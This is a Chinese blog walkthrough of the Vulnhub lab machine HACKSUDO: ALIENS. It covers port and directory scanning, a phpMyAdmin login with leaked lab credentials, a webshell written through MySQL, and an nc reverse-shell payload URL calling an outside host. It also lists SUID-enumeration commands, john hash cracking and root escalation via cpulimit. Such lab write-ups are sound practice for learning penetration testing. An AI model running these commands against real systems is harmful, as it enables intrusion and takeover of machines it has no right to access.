Vulnhub_HACKSUDO: ALIENS – 作者:sec庄sir

本文所有内容均来自我的博客园
https://www.cnblogs.com/secutity-zbk/p/14854452.html
Vulnhub下载地址链接:https://pan.baidu.com/s/1bRsJC5jOqcW0COwkdctuCw
提取码:te6c

0x01环境介绍

靶机 ip:10.10.13.50
kali ip:10.10.13.51

0x02信息收集

image
利用nmap进行端口漏洞的扫描,发现开放22、80、9000端口
既然有80端口,那下一步就是对80端口上的web页面进行扫描
image
利用dirmap扫描,发现一个页面

http://10.10.13.50/backup/

image
页面内容点击下载后,发现几个敏感数据
image
刚刚扫描出来的还有9000端口,访问了一下是phpmyadmin页面,将刚获得的敏感数据输入后,发现成功登陆

vishal/hacksudo

0x03检测

image
发现secure_file_priv为空值即可读可写
image
利用mysql写入一句话木马
image
检查是否存在nc
image

0x04利用

payload:http://10.10.13.50/alien.php?cmd=nc%2010.10.13.253%20%208989%20%20-e%20/bin/bash

将/bin/bash转发到10.10.13.253的8989端口上
image
再利用python -c "import pty;pty.spawn('/bin/bash')"配置虚拟化终端
image
查找具有root权限的suid文件,进行SUID提权

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

image
访问 https://gtfobins.github.io/ ,对查到的内容进行比对尝试提权
image
image
image
创建一个文件1.txt,放密文拷贝到1.txt中
利用john 1.txt对密文进行破解,john –show 1.txt展示破解结果
image
进入hacksudo的账户 hacksudo/aliens
image
查找具有root权限的suid文件,再次进行SUID提权
image
利用cpulimit进行提权
image
执行./cpulimit -l 100 -f -- /bin/sh -p
image
查看/root/root.txt 获得flag
image

0x05总结(个人观点,仅供参考)

  • 信息收集用对工具很重要,信息收集也是渗透中最关键的一步
  • Mysql中secure_file_priv为空值即可读可写
  • 普遍做的都是一句话木马webshell,用的函数都是assert、eval,这里用system可以执行部分系统语句
  • 利用nc反弹shell,这nc得存在才能执行,首先得先判断是否存在,其次就是反弹shell获得的可能是不标准终端
  • https://gtfobins.github.io/ 收集了suid的利用方法,不过比较刁钻,需要配置dns服务器208.67.222.222(仅供参考)才能解析
  • john工具的使用方法 先记着john 1.txt(把文件中的内容进行破解) john –show 1.txt(查看文件中的内容)

来源:freebuf.com 2021-07-28 11:35:45 by: sec庄sir

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论